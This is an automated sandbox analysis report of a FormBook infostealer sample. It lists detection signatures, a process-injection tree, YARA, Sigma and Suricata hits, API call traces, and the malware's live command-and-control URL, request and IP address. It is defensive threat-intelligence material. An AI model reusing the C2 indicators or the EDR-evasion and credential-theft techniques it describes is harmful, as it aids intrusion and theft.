Edit tour

Windows Analysis Report
WDpjhC3jpq.exe

Overview

General Information

Sample name:	WDpjhC3jpq.exe renamed because original name is a hash value
Original sample name:	4e6c9d7c31e90e59eb78c12bbd39d9e08791bc187f56f8a82c1104ae5bb1ff36.exe
Analysis ID:	1587604
MD5:	e11751145ed9153735f2bfefd5a2ce9e
SHA1:	36d603e7529906f247b5ab3d0f78f153511669cd
SHA256:	4e6c9d7c31e90e59eb78c12bbd39d9e08791bc187f56f8a82c1104ae5bb1ff36
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

WDpjhC3jpq.exe (PID: 2036 cmdline: "C:\Users\user\Desktop\WDpjhC3jpq.exe" MD5: E11751145ED9153735F2BFEFD5A2CE9E)

svchost.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\WDpjhC3jpq.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

BrwYqDqbrpK.exe (PID: 6752 cmdline: "C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

find.exe (PID: 2716 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

BrwYqDqbrpK.exe (PID: 5828 cmdline: "C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2664 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2592843183.0000000003510000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3376817582.0000000004F00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2351397025.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2592756925.00000000034A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2353464103.0000000005E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3375408223.0000000002AD0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2352214386.00000000035A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\WDpjhC3jpq.exe", CommandLine: "C:\Users\user\Desktop\WDpjhC3jpq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WDpjhC3jpq.exe", ParentImage: C:\Users\user\Desktop\WDpjhC3jpq.exe, ParentProcessId: 2036, ParentProcessName: WDpjhC3jpq.exe, ProcessCommandLine: "C:\Users\user\Desktop\WDpjhC3jpq.exe", ProcessId: 6968, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\WDpjhC3jpq.exe", CommandLine: "C:\Users\user\Desktop\WDpjhC3jpq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WDpjhC3jpq.exe", ParentImage: C:\Users\user\Desktop\WDpjhC3jpq.exe, ParentProcessId: 2036, ParentProcessName: WDpjhC3jpq.exe, ProcessCommandLine: "C:\Users\user\Desktop\WDpjhC3jpq.exe", ProcessId: 6968, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:34:39.124859+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49887	23.167.152.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.39978.club/4bhh/?AL=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4=&LNB=hTLpR848

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: WDpjhC3jpq.exe	Virustotal: Detection: 66%			Perma Link
Source: WDpjhC3jpq.exe	ReversingLabs: Detection: 79%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2592843183.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3376817582.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2351397025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2592756925.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2353464103.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3375408223.0000000002AD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2352214386.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: WDpjhC3jpq.exe

Joe Sandbox ML: detected

Source: WDpjhC3jpq.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: find.pdb source: svchost.exe, 00000002.00000002.2351638182.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351662035.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3374860434.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BrwYqDqbrpK.exe, 00000003.00000000.2274742725.00000000001FE000.00000002.00000001.01000000.00000004.sdmp, BrwYqDqbrpK.exe, 00000008.00000002.3374382814.00000000001FE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: WDpjhC3jpq.exe, 00000000.00000003.2147999933.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WDpjhC3jpq.exe, 00000000.00000003.2154965803.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2256014939.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258259065.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.000000000339E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593106549.0000000003870000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593106549.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2353937621.00000000036C4000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2351836228.0000000003512000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WDpjhC3jpq.exe, 00000000.00000003.2147999933.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WDpjhC3jpq.exe, 00000000.00000003.2154965803.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2256014939.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258259065.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.000000000339E000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.2593106549.0000000003870000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593106549.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2353937621.00000000036C4000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2351836228.0000000003512000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: find.pdbGCTL source: svchost.exe, 00000002.00000002.2351638182.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351662035.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3374860434.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: find.exe, 00000004.00000002.2592239930.0000000003160000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593469791.0000000003E9C000.00000004.10000000.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000002.3375830534.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.3374262165.00000000071FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: find.exe, 00000004.00000002.2592239930.0000000003160000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593469791.0000000003E9C000.00000004.10000000.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000002.3375830534.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.3374262165.00000000071FC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00266CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00266CA9
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_002660DD
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_002663F9
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0026EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0026EB60
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0026F56F FindFirstFileW,FindClose,	0_2_0026F56F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0026F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0026F5FA
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00271B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00271B2F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00271C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00271C8A
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00271F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00271F94

Source: C:\Windows\SysWOW64\find.exe

Code function: 4x nop then mov ebx, 00000004h

4_2_036004DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49887 -> 23.167.152.41:80

Source: Joe Sandbox View

IP Address: 23.167.152.41 23.167.152.41

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00274EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00274EB5

Source: global traffic

HTTP traffic detected: GET /4bhh/?AL=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4=&LNB=hTLpR848 HTTP/1.1Host: www.39978.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2

Source: global traffic

DNS traffic detected: DNS query: www.39978.club

Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: find.exe, 00000004.00000002.2592239930.000000000317D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: find.exe, 00000004.00000003.2530080848.00000000080B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: find.exe, 00000004.00000002.2592239930.000000000317D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: find.exe, 00000004.00000002.2592239930.000000000317D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: find.exe, 00000004.00000002.2592239930.000000000317D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033w
Source: find.exe, 00000004.00000002.2592239930.000000000317D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: find.exe, 00000004.00000002.2592239930.000000000317D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00276B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00276B0C

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00276D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00276D07

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

0_2_00276B0C

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00262B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00262B37

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0028F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0028F7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2592843183.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3376817582.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2351397025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2592756925.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2353464103.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3375408223.0000000002AD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2352214386.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00223D19
Source: WDpjhC3jpq.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: WDpjhC3jpq.exe, 00000000.00000000.2132174771.00000000002CE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1a00fc9d-4
Source: WDpjhC3jpq.exe, 00000000.00000000.2132174771.00000000002CE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_81f575f7-4
Source: WDpjhC3jpq.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_801aebde-1
Source: WDpjhC3jpq.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a12abdff-7

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C7F3 NtClose,	2_2_0042C7F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B60 NtClose,LdrInitializeThunk,	2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,	2_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274340 NtSetContextThread,	2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274650 NtSuspendThread,	2_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BA0 NtEnumerateValueKey,	2_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B80 NtQueryInformationFile,	2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BE0 NtQueryValueKey,	2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BF0 NtAllocateVirtualMemory,	2_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AB0 NtWaitForSingleObject,	2_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AF0 NtWriteFile,	2_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AD0 NtReadFile,	2_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F30 NtCreateSection,	2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F60 NtCreateProcessEx,	2_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FA0 NtQuerySection,	2_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FB0 NtResumeThread,	2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F90 NtProtectVirtualMemory,	2_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FE0 NtCreateFile,	2_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E30 NtWriteVirtualMemory,	2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EA0 NtAdjustPrivilegesToken,	2_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E80 NtReadVirtualMemory,	2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EE0 NtQueueApcThread,	2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D30 NtUnmapViewOfSection,	2_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D00 NtSetInformationFile,	2_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D10 NtMapViewOfSection,	2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DB0 NtEnumerateKey,	2_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DD0 NtDelayExecution,	2_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C00 NtQueryInformationProcess,	2_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C60 NtCreateKey,	2_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CA0 NtQueryInformationToken,	2_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CF0 NtOpenProcess,	2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CC0 NtQueryVirtualMemory,	2_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273010 NtOpenDirectoryObject,	2_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273090 NtSetValueKey,	2_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032739B0 NtGetContextThread,	2_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D10 NtOpenProcessToken,	2_2_03273D10
